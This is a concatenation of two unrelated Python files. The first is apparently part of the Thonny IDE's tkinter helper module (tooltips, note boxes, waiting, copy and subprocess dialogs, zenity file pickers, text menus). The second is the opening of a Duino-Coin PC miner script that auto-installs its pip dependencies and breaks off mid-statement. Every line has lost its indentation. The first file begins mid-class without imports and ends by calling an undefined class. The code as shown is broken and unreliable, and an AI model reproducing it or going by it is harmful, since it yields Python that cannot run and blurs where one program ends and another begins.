"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
tw.wm_geometry("+%d+%d" % (x, y))
try:
# For Mac OS
tw.tk.call("::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates")
except tk.TclError:
pass
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(tk.Toplevel):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError(_("Unsupported focus"))
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
def create_string_var(value, modification_listener=None):
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return _create_var(tk.StringVar, value, modification_listener)
def create_int_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.IntVar, value, modification_listener)
def create_double_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.DoubleVar, value, modification_listener)
def create_boolean_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.BooleanVar, value, modification_listener)
def _create_var(class_, value, modification_listener):
var = class_(value=value)
var.modified = False
def on_write(*args):
var.modified = True
if modification_listener:
try:
modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
# TODO: https://bugs.python.org/issue22115 (deprecation warning)
var.trace("w", on_write)
return var
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title=_("Remove linenumbers"),
message=_("Do you want to remove linenumbers from pasted text?"),
default=messagebox.YES,
master=master,
parent=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all([len(split_after_line_number(line)) == 2 for line in lines])
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
def center_window(win, master=None):
# for backward compat
return assign_geometry(win, master)
def assign_geometry(win, master=None):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(tk.Toplevel):
def __init__(self, master, async_result, description, title=_("Please wait!"), timeout=None):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description=_("Working")):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
class FileCopyDialog(tk.Toplevel):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title(_("Copying"))
if description is None:
description = _("Copying\n %s\nto\n %s") % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(main_frame, text=_("Cancel"), command=self._cancel)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind("<Escape>", self._cancel, True) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
self._copy_progess = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(tk.Toplevel):
def __init__(
self, master=None, title=_("Choose one"), question: str = _("Choose one:"), choices=[]
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self, text=question)
question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
row += 1
self.var = tk.StringVar()
for choice in choices:
rb = ttk.Radiobutton(self, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self, text=_("OK"), command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self, text=_("Cancel"), command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(tk.Toplevel):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(main_frame, command=self._copy, text=_("Copy to clipboard"), width=20)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(main_frame, command=self._close, text=_("Close"))
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None, title=_("Choose one"), question: str = _("Choose one:"), choices=[]
):
dlg = ChoiceDialog(master, title, question, choices)
show_dialog(dlg, master)
return dlg.result
class SubprocessDialog(tk.Toplevel):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(
self, master, proc, title, long_description=None, autoclose=True, conclusion=_("Done.")
):
self._closed = False
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self.returncode = None
self.cancelled = False
self._autoclose = autoclose
self._event_queue = collections.deque()
self._conclusion = conclusion
tk.Toplevel.__init__(self, master)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(sticky="nsew")
text_font = tk.font.nametofont("TkFixedFont").copy()
text_font["size"] = int(text_font["size"] * 0.9)
text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
text_frame = tktextext.TextFrame(
main_frame,
read_only=True,
horizontal_scrollbar=False,
background=lookup_style_option("TFrame", "background"),
font=text_font,
wrap="word",
)
text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
self.text = text_frame.text
self.text["width"] = 60
self.text["height"] = 7
if long_description is not None:
self.text.direct_insert("1.0", long_description + "\n\n")
self.button = ttk.Button(main_frame, text=_("Cancel"), command=self._close)
self.button.grid(row=1, column=0, pady=(0, 15))
main_frame.rowconfigure(0, weight=1)
main_frame.columnconfigure(0, weight=1)
self.title(title)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
# self.resizable(height=tk.FALSE, width=tk.FALSE)
self.text.focus_set()
self.bind(
"<Escape>", self._close_if_done, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._close)
self._start_listening()
def _start_listening(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self._event_queue.append((stream_name, data))
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
break
self.returncode = self._proc.wait()
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def poll_output_events():
if self._closed:
return
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.see("end")
self.returncode = self._proc.poll()
if self.returncode == None:
self.after(200, poll_output_events)
else:
self.button["text"] = _("OK")
self.button.focus_set()
if self.returncode != 0:
self.text.direct_insert("end", _("\n\nReturn code: "), ("stderr",))
elif self._autoclose:
self._close()
else:
self.text.direct_insert("end", "\n\n" + self._conclusion)
self.text.see("end")
poll_output_events()
def _close_if_done(self, event):
if self._proc.poll() is not None:
self._close(event)
def _close(self, event=None):
if self._proc.poll() is None:
if messagebox.askyesno(
_("Cancel the process?"),
_("The process is still running.\nAre you sure you want to cancel?"),
parent=self,
):
# try gently first
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # @UndefinedVariable
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
self.cancelled = True
# Wait for threads to finish
self._stdout_thread.join(2)
if self._stderr_thread is not None:
self._stderr_thread.join(2)
# fetch output about cancelling
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.direct_insert("end", _("\n\nPROCESS CANCELLED"))
self.text.see("end")
else:
return
else:
self._closed = True
self.destroy()
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux":
return filedialog
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_ensure_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_ensure_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _ensure_parent(options):
if "parent" not in options:
if "master" in options:
options["parent"] = options["master"]
else:
options["parent"] = tk._default_root
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options(_("Open file"), **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options(_("Open files"), **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options(_("Save as"), **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options(_("Select directory"), **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if result.returncode == 0:
return result.stdout.strip()
else:
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
def show_dialog(dlg, master=None, geometry=True):
if master is None:
master = tk._default_root
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master)
# dlg.wm_deiconify()
try:
dlg.grab_set()
except:
pass
dlg.lift()
dlg.focus_set()
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, kind, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(kind, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label=_("Cut"), command=self.on_cut, tester=self.can_cut)
self.add_command(label=_("Copy"), command=self.on_copy, tester=self.can_copy)
self.add_command(label=_("Paste"), command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label=_("Select All"), command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master, text=text if text else url, style="Url.TLabel", cursor="hand2", font=url_font
)
url_label.grid()
url_label.bind("<Button-1>", lambda _: webbrowser.open(url))
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
def get_default_theme():
return "xpnative" if running_on_windows() else "clam"
if __name__ == "__main__":
root = tk.Tk()
closa = ClosableNotebook(root)
closa.add(ttk.Button(closa, text="B1"), text="B1")
closa.add(ttk.Button(closa, text="B2"), text="B2")
closa.grid()
root.mainloop()
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.45)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
thread_lock = Lock()
def install(package):
# Install pip package automatically
check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, * sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
MINER_VER = "2.45" # Version number
SOC_TIMEOUT = 30 # Socket timeout
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
server_ip_file = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
